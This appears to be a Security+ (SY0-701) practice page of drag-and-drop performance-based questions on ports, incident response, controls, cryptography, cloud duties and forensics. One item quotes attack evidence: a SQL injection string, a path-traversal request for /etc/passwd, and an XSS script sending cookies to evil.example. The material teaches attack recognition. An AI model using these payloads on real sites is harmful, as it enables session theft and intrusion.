Performance-Based Questions

The real exam usually opens with 2–4 performance-based questions. Drag each chip onto its target (or tap a chip, then tap a slot), then check your answers. Items are shuffled on every reset.

Match Ports to Protocols

Matching PBQ

Drag each port number onto the service that uses it by default.

SSH / SFTP

Secure remote shell and file transfer

Drop here

DNS

Name resolution (UDP/TCP)

Drop here

HTTPS

TLS-encrypted web traffic

Drop here

RDP

Remote Desktop Protocol

Drop here

LDAPS

LDAP over SSL/TLS

Drop here

Microsoft SQL Server

Database engine traffic

Drop here

Order the Incident Response Phases

Ordering PBQ

Place the seven incident response activities in the order defined by the SY0-701 process.

Step 1

Drop here

Step 2

Drop here

Step 3

Drop here

Step 4

Drop here

Step 5

Drop here

Step 6

Drop here

Step 7

Drop here

Identify the Attack from the Evidence

Matching PBQ

Drag each attack type onto the log entry or observation that indicates it.

Web server log

GET /product.php?id=1' OR '1'='1'-- HTTP/1.1

Drop here

Auth log

One password attempt ('Winter2025!') against 400 different accounts within 10 minutes

Drop here

Support ticket

Users report popups on the reviews page; page source contains <script>document.location='http://evil.example/c?'+document.cookie</script>

Drop here

Web server log

GET /download?file=../../../../etc/passwd HTTP/1.1

Drop here

NetFlow data

Massive inbound UDP from thousands of open NTP servers, all responses to requests the company never sent

Drop here

Email gateway alert

Mass inbound mail from paypa1-security.example asking users to 'verify' their credentials

Drop here

Classify the Security Controls

Matching PBQ

Drag each control type onto its real-world example.

Example

802.1X blocks unauthorized devices from connecting to the network

Drop here

Example

SIEM raises an alert after correlating failed logins across servers

Drop here

Example

Restoring the file server from last night's backup after ransomware

Drop here

Example

'This facility is under 24/7 video surveillance' signs at every entrance

Drop here

Example

Isolating an unpatchable legacy SCADA system on its own VLAN

Drop here

Example

A policy requiring all staff to lock screens when leaving their desk

Drop here

Order of Volatility (Forensics)

Ordering PBQ

A workstation is compromised. Order the evidence sources from MOST volatile (collect first) to LEAST volatile (collect last).

Collect 1st

Drop here

Collect 2nd

Drop here

Collect 3rd

Drop here

Collect 4th

Drop here

Collect 5th

Drop here

Place the Security Appliance

Matching PBQ

Drag each technology onto the requirement it satisfies BEST.

Requirement

Block SQL injection and XSS against the public e-commerce site

Drop here

Requirement

Check device posture (AV, patches) before granting LAN access

Drop here

Requirement

Stop employees emailing files containing credit card numbers

Drop here

Requirement

Aggregate and correlate logs from 200 systems with real-time alerting

Drop here

Requirement

Detect and isolate malicious processes on laptops, with rollback

Drop here

Requirement

Give admins one hardened, audited path into the server management VLAN

Drop here

Classify the Authentication Factors

Matching PBQ

Drag each authentication factor category onto the concrete example that belongs to it.

Example

A password typed at the login prompt

Drop here

Example

A TOTP hardware token that displays a rotating 6-digit code

Drop here

Example

A fingerprint scanned to unlock a laptop

Drop here

Example

Login allowed only when GPS places the user inside the home country

Drop here

Match the Agreement to the Situation

Matching PBQ

Drag each agreement type onto the contracting situation it fits BEST.

Situation

A consultant will see trade secrets and must be legally barred from disclosing them

Drop here

Situation

The cloud provider must guarantee 99.99% uptime with penalties for missing it

Drop here

Situation

Two companies expect many future projects and want one umbrella contract covering the general terms for all of them

Drop here

Situation

A document defines the specific deliverables, timeline, and milestones for one penetration test engagement

Drop here

Situation

Two agencies sign a non-binding statement of intent to cooperate on threat intelligence sharing

Drop here

Situation

Two firms formalize a partnership, defining each partner's responsibilities and how profits are divided

Drop here

Pick the Right Cryptographic Tool

Matching PBQ

Drag each cryptographic technique onto the requirement it satisfies BEST.

Requirement

Verify a downloaded file has not been altered in transit

Drop here

Requirement

Encrypt terabytes of data at rest with minimal performance impact

Drop here

Requirement

Exchange a secret key with a stranger over an untrusted network

Drop here

Requirement

Prove a message came from the sender, who cannot later deny sending it

Drop here

Requirement

Replace stored credit card numbers with substitute values that have no mathematical relationship to the originals

Drop here

Requirement

Stop attackers from cracking a stolen password database with precomputed rainbow tables

Drop here

Order Wireless Security from Weakest to Strongest

Ordering PBQ

Arrange the wireless security protocols from WEAKEST (place first) to STRONGEST (place last).

Step 1

Weakest

Drop here

Step 2

Drop here

Step 3

Drop here

Step 4

Strongest

Drop here

Order the Risk Management Steps

Ordering PBQ

Arrange the risk management activities in the order they are performed.

Step 1

Drop here

Step 2

Drop here

Step 3

Drop here

Step 4

Drop here

Step 5

Drop here

Order the Firewall Rules Correctly

Ordering PBQ

Firewalls evaluate rules top-down and stop at the FIRST match. Arrange the rules so specific blocks come before broader allows, and the catch-all deny lands last.

Step 1

Evaluated first

Drop here

Step 2

Drop here

Step 3

Drop here

Step 4

Evaluated last

Drop here

Pick the Best Log Source

Matching PBQ

An incident responder needs answers. Drag each log or data source onto the investigative question it answers BEST.

Question

Which internal hosts contacted the malicious domain?

Drop here

Question

What exact data left the network in that session?

Drop here

Question

Which process spawned the suspicious executable?

Drop here

Question

Whose credentials were used at 03:12?

Drop here

Question

Was there a beaconing pattern of small periodic connections?

Drop here

Question

Which port did the attacker connect to on the DMZ server?

Drop here

Order the Change Management Process

Ordering PBQ

Arrange the change management activities in the order a well-run organization performs them.

Step 1

Drop here

Step 2

Drop here

Step 3

Drop here

Step 4

Drop here

Step 5

Drop here

Step 6

Drop here

Match the Data Role

Matching PBQ

Drag each data governance role onto the description that defines it.

Description

Senior executive accountable for a data set who classifies it and decides who may access it

Drop here

Description

Organization that determines the purposes and means of processing personal data

Drop here

Description

Third party that processes personal data only on the controller's documented instructions

Drop here

Description

IT staff who implement the day-to-day protections: backups, permissions, encryption

Drop here

Description

The individual person whom the personal data identifies or describes

Drop here

Order the Certificate Lifecycle

Ordering PBQ

Arrange the steps of a TLS server certificate's lifecycle in the order they occur.

Step 1

Drop here

Step 2

Drop here

Step 3

Drop here

Step 4

Drop here

Step 5

Drop here

Step 6

Drop here

Order the Vulnerability Management Cycle

Ordering PBQ

Arrange the vulnerability management activities in the order they are performed in one cycle.

Step 1

Drop here

Step 2

Drop here

Step 3

Drop here

Step 4

Drop here

Step 5

Drop here

Step 6

Drop here

Name That Social Engineering Attack

Matching PBQ

Drag each social engineering attack onto the scenario that describes it.

Scenario

A spear-phishing email crafted specifically for the CFO references her upcoming board meeting by name

Drop here

Scenario

A caller claiming to be from the bank's fraud department asks an employee to read back a verification code over the phone

Drop here

Scenario

An attacker invents a story about being a new IT auditor to convince the receptionist to share the visitor access procedures

Drop here

Scenario

Attackers compromise an industry association website they know the target company's engineers visit daily

Drop here

Scenario

Users who mistype the company domain as 'examp1e.com' land on a fake login page that harvests credentials

Drop here

Scenario

An email from the CEO's actual compromised account instructs accounting to urgently wire funds to a new supplier

Drop here

Pick the Hardening Technique

Matching PBQ

Drag each hardening technique onto the risk scenario it addresses BEST.

Risk

Users keep downloading and running unapproved executables that turn out to be malware

Drop here

Risk

A vulnerability scan shows Telnet and an old FTP daemon listening on servers where nobody uses them

Drop here

Risk

New network cameras still accept the factory admin/admin login printed in the vendor manual

Drop here

Risk

A sales laptop containing customer records is stolen from a parked car

Drop here

Risk

Once inside the flat network, malware spreads laterally by connecting directly to workstations' open ports

Drop here

Risk

Workstations ship with preinstalled trial apps and games that nobody patches, expanding the attack surface

Drop here

Order the 802.1X Authentication Flow

Ordering PBQ

A laptop plugs into a port protected by 802.1X. Arrange the steps of the authentication flow in the order they occur.

Step 1

Drop here

Step 2

Drop here

Step 3

Drop here

Step 4

Drop here

Step 5

Drop here

Step 6

Drop here

Who Secures What in the Cloud

Matching PBQ

Under the cloud shared responsibility model, drag each responsibility onto the scenario it would have addressed. Note who holds each duty — provider or customer — depending on the service model.

Scenario

An intruder tailgates into the cloud region's server building and reaches the racks

Drop here

Scenario

A VM-escape vulnerability in the virtualization layer lets one tenant read another tenant's memory

Drop here

Scenario

A company's IaaS Linux VMs are compromised through a kernel flaw fixed by an update nobody installed

Drop here

Scenario

An app the team built on a PaaS platform is breached through a SQL injection flaw in its own code

Drop here

Scenario

A terminated employee logs into the SaaS CRM months later because the account was never disabled

Drop here

Scenario

Sensitive records were uploaded to a public bucket because nobody had labeled the data as confidential

Drop here

Identify the Wireless Attack

Matching PBQ

Drag each wireless attack onto the evidence that indicates it.

Evidence

A second AP broadcasts the corporate SSID with a stronger signal, and users who join it are shown a fake captive portal asking for credentials

Drop here

Evidence

A site survey finds an unauthorized consumer Wi-Fi router plugged into a live wall jack in a conference room, bridging into the corporate LAN

Drop here

Evidence

A packet capture shows floods of spoofed 802.11 management frames repeatedly kicking clients off the WLAN, forcing them to reconnect

Drop here

Evidence

Contacts and messages were silently copied from an executive's phone over a Bluetooth connection while she sat in an airport lounge

Drop here

Evidence

Door logs show an employee's badge entering the building while that employee was verifiably abroad — the badge's data had been copied to a duplicate card

Drop here

Evidence

All Wi-Fi channels in the warehouse show a constant wall of RF noise and every wireless device loses connectivity at once

Drop here

Order the TLS Handshake (simplified)

Ordering PBQ

A browser opens an HTTPS connection. Arrange the simplified TLS handshake steps in the order they occur.

Step 1

Drop here

Step 2

Drop here

Step 3

Drop here

Step 4

Drop here

Step 5

Drop here

Match the Physical Control

Matching PBQ

Drag each physical security control onto the purpose it serves BEST.

Purpose

Stop tailgating by allowing only one authenticated person through a two-door chamber at a time

Drop here

Purpose

Prevent a vehicle from ramming through the building entrance

Drop here

Purpose

Block all radio signals from entering or leaving the forensics lab where seized phones are examined

Drop here

Purpose

Keep the industrial control network physically disconnected from any other network, including the internet

Drop here

Purpose

Detect an intruder's footsteps crossing the floor of a restricted area after hours

Drop here

Purpose

Provide a human who can verify IDs, challenge suspicious behavior, and adapt to situations no automated control anticipates

Drop here

Order the Forensic Investigation

Ordering PBQ

A digital forensic investigation begins after a suspected breach. Arrange the activities in the order they are performed.

Step 1

Drop here

Step 2

Drop here

Step 3

Drop here

Step 4

Drop here

Step 5

Drop here

Step 6

Drop here

Match the Tool to Its Function

Matching PBQ

Drag each security tool onto the one-line description of what it does.

Function

Aggregates and correlates logs from across the environment to surface security alerts

Drop here

Function

Runs automated playbooks that respond to alerts without waiting for a human analyst

Drop here

Function

Monitors endpoint processes and behavior, and can isolate a compromised host

Drop here

Function

Baselines normal user and entity behavior and flags anomalies like a 3 a.m. mass download

Drop here

Function

Inspects outbound data and blocks sensitive content from leaving the organization

Drop here

Function

Watches critical system and configuration files and alerts when their hashes change

Drop here